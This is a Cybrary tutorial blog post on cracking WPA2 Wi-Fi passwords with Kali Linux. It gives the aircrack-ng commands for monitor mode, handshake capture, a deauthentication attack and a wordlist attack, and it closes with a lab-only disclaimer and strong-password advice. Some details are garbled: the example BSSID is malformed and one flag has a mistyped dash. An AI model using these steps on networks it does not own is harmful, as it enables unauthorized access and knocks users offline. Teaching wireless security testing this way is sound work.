Ready to Start Your Career?

Ethical Hacking with Kali Linux – Part 4: Breaking WPA2 Wireless

bjacharya 's profile image

By: bjacharya

April 4, 2016

Ethical Hacking with Kali Linux – Part 4: Breaking WPA2 Wireless - Cybrary

Ethical Hacking with Kali Linux – Part 4: Breaking WPA2 Wireless

>> Welcome all, to this series of Kali Linux for Ethical Hacking. This is fourth part and I’ll explain the process of Breaking Wireless WPA2. #Tools used:airmon-ngairodump-ngaireplay-ngaircrack #...Let's begin– Before starting, make sure you have eth0, lo, wlan0 in action. (Go to terminal and run ifconfig)– Let’s start to monitor on the wireless interface, run:

airmon-ng start wlan0

– After executing above command, we must get a new interface mon0 (monitor mode enabled)– Verify that both interfaces are up and running, run:

airmon-ng

– Watch for wlan0 and mon0, run :

airodump-ng mon0

– For monitoring all the APs that Kali Linux OS can find out.#Next steps– In this next step, notice ESSID, BSSID & ENCRYPTION (ENC) of Wireless (in this case, let’s assume ESSID in nhc-bj, ENC is WPA2 & BSSID is 00:A1:B2:11:20:13:5T)– CTRL+C (press)– Run:

airodump-ng -w FILE -c 1 –bssid 00:A1:B2:11:20:13:5T mon0

(-c is for channel. Channel is 1 for the BSSID we are trying to connect to, -w is for creating new file with name FILE). With each step done by the tools, we'll store them in the FILE we just created.– Once you execute the above command, it starts collecting information and writes it to our file named “FILE”.– You can leave it open, so it collects information. OR, as we discussed in earlier part of this post, you can carry out de-auth attack.– For that, open new window and clone a session. Then execute the de-auth attack process.– Run:

aireplay-ng -0 0 -a 00:A1:B2:11:20:13:5T mon0

(Let it run for 60sec)

– CTRL+C– Check it out in the other window that we left open.– CTRL+C– Run:

ls(you will get files as FILE-01.cap FILE-01.csv and others)

– Now, we use a dictionary attack. Run:

aircrack-ng FILE-01.cap -w /pentest/passwords/wordlists/darkc0de.lst

– The process starts for discovering a Pre-Shared Key (Password). Conclusion: We can find hidden SSIDs, bypass MAC filters and even can crack WP2. Now, how to secure is our WiFi? Well, use really strong passwords, with mixed up contents, so that dictionary attacks would fail to locate it in itslist. A quick note: This series is only for educational purpose. Practice this series in a lab, in a virtual/separate network and always avoid illegal activities. If you can, then support us in fighting the bad guys.See the other posts in this series:Ethical Hacking with Kali Linux – Part 1: ObjectiveEthical Hacking with Kali Linux – Part 2: Finding Hidden SSIDSEthical Hacking with Kali Linux – Part 3: Bypassing the MAC Address FilterEthical Hacking with Kali Linux – Part 5: Rogue Wireless Access PointsEthical Hacking with Kali Linux – Part 6: Nmap (Network Mapper)
By: BIJAY ACHARYA  (twitter : @acharya_bijay) 
Schedule Demo